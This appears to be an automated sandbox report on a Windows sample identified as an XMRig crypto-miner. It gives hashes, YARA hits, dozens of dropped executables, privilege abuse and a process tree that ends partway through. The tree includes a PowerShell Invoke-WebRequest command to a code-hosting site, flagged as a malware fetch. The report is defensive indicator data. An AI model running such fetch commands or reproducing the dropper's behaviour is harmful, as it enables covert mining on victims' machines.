xmrig | af022d201eca1b78aebc502d19eca4f16f836b6bcbeb1e4686f7788e07a502da

Analysis

max time kernel
94s
max time network
130s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
10-05-2024 00:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
Size

2.8MB
MD5

2e93a348c20bc27aeb7c8748ff752d80
SHA1

c7c9a929a83c51d3250e1ead0e3a35353f1f16f6
SHA256

af022d201eca1b78aebc502d19eca4f16f836b6bcbeb1e4686f7788e07a502da
SHA512

b19a26ab0b0f1caed3df921f27063701f1c32dc880302a2e663754bff9163516fd2540f76156fa815b0352f230fdff3e720237ae7aefedbc31e9eb4b9082cc97
SSDEEP

49152:S1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkHC0IlnASEx/wfM:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2R4

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/2188-0-0x00007FF7279A0000-0x00007FF727D96000-memory.dmp	xmrig
behavioral2/files/0x0007000000023278-5.dat	xmrig
behavioral2/files/0x00080000000233ff-7.dat	xmrig
behavioral2/files/0x0007000000023400-20.dat	xmrig
behavioral2/files/0x0007000000023401-31.dat	xmrig
behavioral2/files/0x0007000000023403-38.dat	xmrig
behavioral2/files/0x0007000000023404-59.dat	xmrig
behavioral2/files/0x0008000000023405-81.dat	xmrig
behavioral2/files/0x000700000002340b-91.dat	xmrig
behavioral2/files/0x000700000002340d-100.dat	xmrig
behavioral2/files/0x0007000000023411-115.dat	xmrig
behavioral2/files/0x000700000002341c-170.dat	xmrig
behavioral2/files/0x000700000002341d-175.dat	xmrig
behavioral2/files/0x000700000002341b-173.dat	xmrig
behavioral2/files/0x000700000002341a-168.dat	xmrig
behavioral2/files/0x0007000000023419-163.dat	xmrig
behavioral2/files/0x0007000000023418-158.dat	xmrig
behavioral2/files/0x0007000000023417-148.dat	xmrig
behavioral2/files/0x0007000000023416-146.dat	xmrig
behavioral2/files/0x0007000000023415-143.dat	xmrig
behavioral2/files/0x0007000000023414-138.dat	xmrig
behavioral2/files/0x0007000000023413-133.dat	xmrig
behavioral2/files/0x0007000000023412-128.dat	xmrig
behavioral2/files/0x0007000000023410-118.dat	xmrig
behavioral2/files/0x000700000002340f-110.dat	xmrig
behavioral2/files/0x000700000002340e-106.dat	xmrig
behavioral2/files/0x000700000002340c-96.dat	xmrig
behavioral2/files/0x000700000002340a-85.dat	xmrig
behavioral2/files/0x0007000000023409-75.dat	xmrig
behavioral2/files/0x0007000000023408-71.dat	xmrig
behavioral2/files/0x0007000000023407-66.dat	xmrig
behavioral2/files/0x0008000000023406-61.dat	xmrig
behavioral2/files/0x0007000000023402-34.dat	xmrig
behavioral2/memory/4904-15-0x00007FF7F8960000-0x00007FF7F8D56000-memory.dmp	xmrig
behavioral2/files/0x00080000000233fc-13.dat	xmrig
behavioral2/memory/4532-819-0x00007FF639940000-0x00007FF639D36000-memory.dmp	xmrig
behavioral2/memory/3372-826-0x00007FF67F750000-0x00007FF67FB46000-memory.dmp	xmrig
behavioral2/memory/3648-833-0x00007FF7D6E40000-0x00007FF7D7236000-memory.dmp	xmrig
behavioral2/memory/1356-837-0x00007FF693680000-0x00007FF693A76000-memory.dmp	xmrig
behavioral2/memory/3628-843-0x00007FF7AF850000-0x00007FF7AFC46000-memory.dmp	xmrig
behavioral2/memory/4588-853-0x00007FF6E32A0000-0x00007FF6E3696000-memory.dmp	xmrig
behavioral2/memory/3232-861-0x00007FF7B75E0000-0x00007FF7B79D6000-memory.dmp	xmrig
behavioral2/memory/2144-864-0x00007FF7B75D0000-0x00007FF7B79C6000-memory.dmp	xmrig
behavioral2/memory/4664-877-0x00007FF6BD180000-0x00007FF6BD576000-memory.dmp	xmrig
behavioral2/memory/4740-878-0x00007FF77A3B0000-0x00007FF77A7A6000-memory.dmp	xmrig
behavioral2/memory/3636-880-0x00007FF6B37D0000-0x00007FF6B3BC6000-memory.dmp	xmrig
behavioral2/memory/5076-886-0x00007FF6E3C90000-0x00007FF6E4086000-memory.dmp	xmrig
behavioral2/memory/4444-891-0x00007FF6C26D0000-0x00007FF6C2AC6000-memory.dmp	xmrig
behavioral2/memory/2956-896-0x00007FF694290000-0x00007FF694686000-memory.dmp	xmrig
behavioral2/memory/1076-899-0x00007FF6743C0000-0x00007FF6747B6000-memory.dmp	xmrig
behavioral2/memory/4216-902-0x00007FF669FE0000-0x00007FF66A3D6000-memory.dmp	xmrig
behavioral2/memory/3028-900-0x00007FF7C99B0000-0x00007FF7C9DA6000-memory.dmp	xmrig
behavioral2/memory/2496-895-0x00007FF74DBC0000-0x00007FF74DFB6000-memory.dmp	xmrig
behavioral2/memory/2360-872-0x00007FF7FB540000-0x00007FF7FB936000-memory.dmp	xmrig
behavioral2/memory/3584-869-0x00007FF7C3AB0000-0x00007FF7C3EA6000-memory.dmp	xmrig
behavioral2/memory/3204-867-0x00007FF791570000-0x00007FF791966000-memory.dmp	xmrig
behavioral2/memory/1716-858-0x00007FF72C630000-0x00007FF72CA26000-memory.dmp	xmrig
behavioral2/memory/3556-846-0x00007FF7A7160000-0x00007FF7A7556000-memory.dmp	xmrig
behavioral2/memory/4904-2214-0x00007FF7F8960000-0x00007FF7F8D56000-memory.dmp	xmrig
behavioral2/memory/4904-2218-0x00007FF7F8960000-0x00007FF7F8D56000-memory.dmp	xmrig
behavioral2/memory/3028-2219-0x00007FF7C99B0000-0x00007FF7C9DA6000-memory.dmp	xmrig
behavioral2/memory/4216-2220-0x00007FF669FE0000-0x00007FF66A3D6000-memory.dmp	xmrig
behavioral2/memory/4532-2221-0x00007FF639940000-0x00007FF639D36000-memory.dmp	xmrig
behavioral2/memory/3372-2224-0x00007FF67F750000-0x00007FF67FB46000-memory.dmp	xmrig

Blocklisted process makes network request 8 IoCs

flow	pid	Process
3	3804	powershell.exe
6	3804	powershell.exe
9	3804	powershell.exe
10	3804	powershell.exe
12	3804	powershell.exe
13	3804	powershell.exe
17	3804	powershell.exe
18	3804	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3804	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
4904	GlWbiSX.exe
3028	WzJTqis.exe
4216	ljeAIJB.exe
4532	ruXDkiZ.exe
3372	yYEZjDI.exe
3648	POZFaMl.exe
1356	KhASepu.exe
3628	snRtvqk.exe
3556	WheXMmb.exe
4588	BZPeLDR.exe
1716	NjarhzE.exe
3232	IuSmGbS.exe
2144	QQWvfJZ.exe
3204	WkgUQxE.exe
3584	hHKFqeA.exe
2360	pXIWKCi.exe
4664	rxDeurv.exe
4740	BwdTzPm.exe
3636	kxDVvfz.exe
5076	NFbMiYC.exe
4444	VhvJneu.exe
2496	xNDDeFN.exe
2956	gCjYLiO.exe
1076	rAsjPqL.exe
3800	DtQcveW.exe
2216	StzyGgL.exe
3032	NenfCaW.exe
2944	vEnlVXK.exe
3404	dsNbutd.exe
4468	tvatPJK.exe
1472	trGCXef.exe
1428	FdvvIij.exe
4500	lfsRCTa.exe
3620	TMExwER.exe
2424	SajrVKN.exe
3308	fxhHLpy.exe
5100	RKkQsgY.exe
760	UqhPxdw.exe
4324	vKkcAuz.exe
1616	SjXlYPT.exe
1144	DcJswQC.exe
5040	ijuQYMO.exe
1504	IazzGPn.exe
4712	MkBtCKG.exe
1004	YCpGSOs.exe
1704	YeEMzzs.exe
2536	HHqQayC.exe
3360	RQgQkDO.exe
4788	CYKXhUb.exe
968	kBYSCyJ.exe
4600	NinyBsQ.exe
1612	SFOSAtV.exe
2168	nFdlgQE.exe
2156	jDVfaLV.exe
2828	QPHcGBi.exe
652	HxIoaBE.exe
4400	IjNCePv.exe
840	mvLwrue.exe
3268	nRBXErH.exe
3876	ntvBraQ.exe
1976	YHmjtEy.exe
2808	umqvDFP.exe
3752	fCSbZQO.exe
1684	ZvpqxRV.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2188-0-0x00007FF7279A0000-0x00007FF727D96000-memory.dmp	upx
behavioral2/files/0x0007000000023278-5.dat	upx
behavioral2/files/0x00080000000233ff-7.dat	upx
behavioral2/files/0x0007000000023400-20.dat	upx
behavioral2/files/0x0007000000023401-31.dat	upx
behavioral2/files/0x0007000000023403-38.dat	upx
behavioral2/files/0x0007000000023404-59.dat	upx
behavioral2/files/0x0008000000023405-81.dat	upx
behavioral2/files/0x000700000002340b-91.dat	upx
behavioral2/files/0x000700000002340d-100.dat	upx
behavioral2/files/0x0007000000023411-115.dat	upx
behavioral2/files/0x000700000002341c-170.dat	upx
behavioral2/files/0x000700000002341d-175.dat	upx
behavioral2/files/0x000700000002341b-173.dat	upx
behavioral2/files/0x000700000002341a-168.dat	upx
behavioral2/files/0x0007000000023419-163.dat	upx
behavioral2/files/0x0007000000023418-158.dat	upx
behavioral2/files/0x0007000000023417-148.dat	upx
behavioral2/files/0x0007000000023416-146.dat	upx
behavioral2/files/0x0007000000023415-143.dat	upx
behavioral2/files/0x0007000000023414-138.dat	upx
behavioral2/files/0x0007000000023413-133.dat	upx
behavioral2/files/0x0007000000023412-128.dat	upx
behavioral2/files/0x0007000000023410-118.dat	upx
behavioral2/files/0x000700000002340f-110.dat	upx
behavioral2/files/0x000700000002340e-106.dat	upx
behavioral2/files/0x000700000002340c-96.dat	upx
behavioral2/files/0x000700000002340a-85.dat	upx
behavioral2/files/0x0007000000023409-75.dat	upx
behavioral2/files/0x0007000000023408-71.dat	upx
behavioral2/files/0x0007000000023407-66.dat	upx
behavioral2/files/0x0008000000023406-61.dat	upx
behavioral2/files/0x0007000000023402-34.dat	upx
behavioral2/memory/4904-15-0x00007FF7F8960000-0x00007FF7F8D56000-memory.dmp	upx
behavioral2/files/0x00080000000233fc-13.dat	upx
behavioral2/memory/4532-819-0x00007FF639940000-0x00007FF639D36000-memory.dmp	upx
behavioral2/memory/3372-826-0x00007FF67F750000-0x00007FF67FB46000-memory.dmp	upx
behavioral2/memory/3648-833-0x00007FF7D6E40000-0x00007FF7D7236000-memory.dmp	upx
behavioral2/memory/1356-837-0x00007FF693680000-0x00007FF693A76000-memory.dmp	upx
behavioral2/memory/3628-843-0x00007FF7AF850000-0x00007FF7AFC46000-memory.dmp	upx
behavioral2/memory/4588-853-0x00007FF6E32A0000-0x00007FF6E3696000-memory.dmp	upx
behavioral2/memory/3232-861-0x00007FF7B75E0000-0x00007FF7B79D6000-memory.dmp	upx
behavioral2/memory/2144-864-0x00007FF7B75D0000-0x00007FF7B79C6000-memory.dmp	upx
behavioral2/memory/4664-877-0x00007FF6BD180000-0x00007FF6BD576000-memory.dmp	upx
behavioral2/memory/4740-878-0x00007FF77A3B0000-0x00007FF77A7A6000-memory.dmp	upx
behavioral2/memory/3636-880-0x00007FF6B37D0000-0x00007FF6B3BC6000-memory.dmp	upx
behavioral2/memory/5076-886-0x00007FF6E3C90000-0x00007FF6E4086000-memory.dmp	upx
behavioral2/memory/4444-891-0x00007FF6C26D0000-0x00007FF6C2AC6000-memory.dmp	upx
behavioral2/memory/2956-896-0x00007FF694290000-0x00007FF694686000-memory.dmp	upx
behavioral2/memory/1076-899-0x00007FF6743C0000-0x00007FF6747B6000-memory.dmp	upx
behavioral2/memory/4216-902-0x00007FF669FE0000-0x00007FF66A3D6000-memory.dmp	upx
behavioral2/memory/3028-900-0x00007FF7C99B0000-0x00007FF7C9DA6000-memory.dmp	upx
behavioral2/memory/2496-895-0x00007FF74DBC0000-0x00007FF74DFB6000-memory.dmp	upx
behavioral2/memory/2360-872-0x00007FF7FB540000-0x00007FF7FB936000-memory.dmp	upx
behavioral2/memory/3584-869-0x00007FF7C3AB0000-0x00007FF7C3EA6000-memory.dmp	upx
behavioral2/memory/3204-867-0x00007FF791570000-0x00007FF791966000-memory.dmp	upx
behavioral2/memory/1716-858-0x00007FF72C630000-0x00007FF72CA26000-memory.dmp	upx
behavioral2/memory/3556-846-0x00007FF7A7160000-0x00007FF7A7556000-memory.dmp	upx
behavioral2/memory/4904-2214-0x00007FF7F8960000-0x00007FF7F8D56000-memory.dmp	upx
behavioral2/memory/4904-2218-0x00007FF7F8960000-0x00007FF7F8D56000-memory.dmp	upx
behavioral2/memory/3028-2219-0x00007FF7C99B0000-0x00007FF7C9DA6000-memory.dmp	upx
behavioral2/memory/4216-2220-0x00007FF669FE0000-0x00007FF66A3D6000-memory.dmp	upx
behavioral2/memory/4532-2221-0x00007FF639940000-0x00007FF639D36000-memory.dmp	upx
behavioral2/memory/3372-2224-0x00007FF67F750000-0x00007FF67FB46000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\YsPRpXP.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\oNDuDqr.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\lUjXIGm.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\xogrbbT.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\iUwXtQJ.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\cMkiHlP.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\XxjKBMX.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\HgYHHhN.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\cgPDuHU.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\PsdSNWv.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\FrIIPxE.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\WJsHjJO.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\iWOBotT.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\srWLrEX.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\bJeHqaE.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\uuYxLlV.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\IIdwxzl.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\zTtKztc.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\YNahSpa.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\ZtHfyMb.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\VFsLPId.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\ribhkTs.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\RnwkmBV.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\iKByDcE.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\SYGVpMs.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\zpEXObF.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\nsAdvHa.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\LkywOGb.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\DMZAcid.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\RpSncCp.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\QwzPtPf.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\uoIFdhH.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\OlciNIo.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\WYNQFJN.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\bLKzqNv.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\qckpTtw.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\ydLDtHr.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\sfxCgfW.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\HatfaPU.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\tmshQkK.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\QEvXTyQ.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\zfyWosE.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\oxboASy.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\hkKxXxe.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\hANiodv.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\ShTbDHm.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\SajrVKN.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\CBvFIPb.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\IaagiBQ.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\PGZZzTD.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\ChKtAtW.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\fpZMRoC.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\boyiuKN.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\bYtQRpd.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\WjSNDUr.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\zhxOcsJ.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\rLupYeU.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\vWBAYQN.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\hezxHDs.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\pmRvMnF.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\yqjckxU.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\ykQbnpb.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\sGJozCk.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
File created	C:\Windows\System\imkjJgl.exe	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3804	powershell.exe
3804	powershell.exe
3804	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3804	powershell.exe
Token: SeLockMemoryPrivilege	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2188 wrote to memory of 3804	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	84
PID 2188 wrote to memory of 3804	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	84
PID 2188 wrote to memory of 4904	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	85
PID 2188 wrote to memory of 4904	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	85
PID 2188 wrote to memory of 3028	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	86
PID 2188 wrote to memory of 3028	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	86
PID 2188 wrote to memory of 4216	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	87
PID 2188 wrote to memory of 4216	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	87
PID 2188 wrote to memory of 4532	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	88
PID 2188 wrote to memory of 4532	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	88
PID 2188 wrote to memory of 3648	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	89
PID 2188 wrote to memory of 3648	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	89
PID 2188 wrote to memory of 3372	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	90
PID 2188 wrote to memory of 3372	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	90
PID 2188 wrote to memory of 1356	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	91
PID 2188 wrote to memory of 1356	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	91
PID 2188 wrote to memory of 3628	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	92
PID 2188 wrote to memory of 3628	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	92
PID 2188 wrote to memory of 3556	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	93
PID 2188 wrote to memory of 3556	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	93
PID 2188 wrote to memory of 4588	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	94
PID 2188 wrote to memory of 4588	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	94
PID 2188 wrote to memory of 1716	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	95
PID 2188 wrote to memory of 1716	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	95
PID 2188 wrote to memory of 3232	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	96
PID 2188 wrote to memory of 3232	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	96
PID 2188 wrote to memory of 2144	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	97
PID 2188 wrote to memory of 2144	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	97
PID 2188 wrote to memory of 3204	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	98
PID 2188 wrote to memory of 3204	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	98
PID 2188 wrote to memory of 3584	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	99
PID 2188 wrote to memory of 3584	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	99
PID 2188 wrote to memory of 2360	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	100
PID 2188 wrote to memory of 2360	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	100
PID 2188 wrote to memory of 4664	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	101
PID 2188 wrote to memory of 4664	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	101
PID 2188 wrote to memory of 4740	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	102
PID 2188 wrote to memory of 4740	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	102
PID 2188 wrote to memory of 3636	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	103
PID 2188 wrote to memory of 3636	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	103
PID 2188 wrote to memory of 5076	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	104
PID 2188 wrote to memory of 5076	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	104
PID 2188 wrote to memory of 4444	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	105
PID 2188 wrote to memory of 4444	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	105
PID 2188 wrote to memory of 2496	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	106
PID 2188 wrote to memory of 2496	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	106
PID 2188 wrote to memory of 2956	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	107
PID 2188 wrote to memory of 2956	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	107
PID 2188 wrote to memory of 1076	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	108
PID 2188 wrote to memory of 1076	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	108
PID 2188 wrote to memory of 3800	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	109
PID 2188 wrote to memory of 3800	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	109
PID 2188 wrote to memory of 2216	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	110
PID 2188 wrote to memory of 2216	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	110
PID 2188 wrote to memory of 3032	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	111
PID 2188 wrote to memory of 3032	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	111
PID 2188 wrote to memory of 2944	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	112
PID 2188 wrote to memory of 2944	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	112
PID 2188 wrote to memory of 3404	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	113
PID 2188 wrote to memory of 3404	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	113
PID 2188 wrote to memory of 4468	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	114
PID 2188 wrote to memory of 4468	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	114
PID 2188 wrote to memory of 1472	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	115
PID 2188 wrote to memory of 1472	2188	2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe	115

C:\Users\Admin\AppData\Local\Temp\2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\2e93a348c20bc27aeb7c8748ff752d80_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2188
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3804
- C:\Windows\System\GlWbiSX.exe
  C:\Windows\System\GlWbiSX.exe
  2⤵
  - Executes dropped EXE
  PID:4904
- C:\Windows\System\WzJTqis.exe
  C:\Windows\System\WzJTqis.exe
  2⤵
  - Executes dropped EXE
  PID:3028
- C:\Windows\System\ljeAIJB.exe
  C:\Windows\System\ljeAIJB.exe
  2⤵
  - Executes dropped EXE
  PID:4216
- C:\Windows\System\ruXDkiZ.exe
  C:\Windows\System\ruXDkiZ.exe
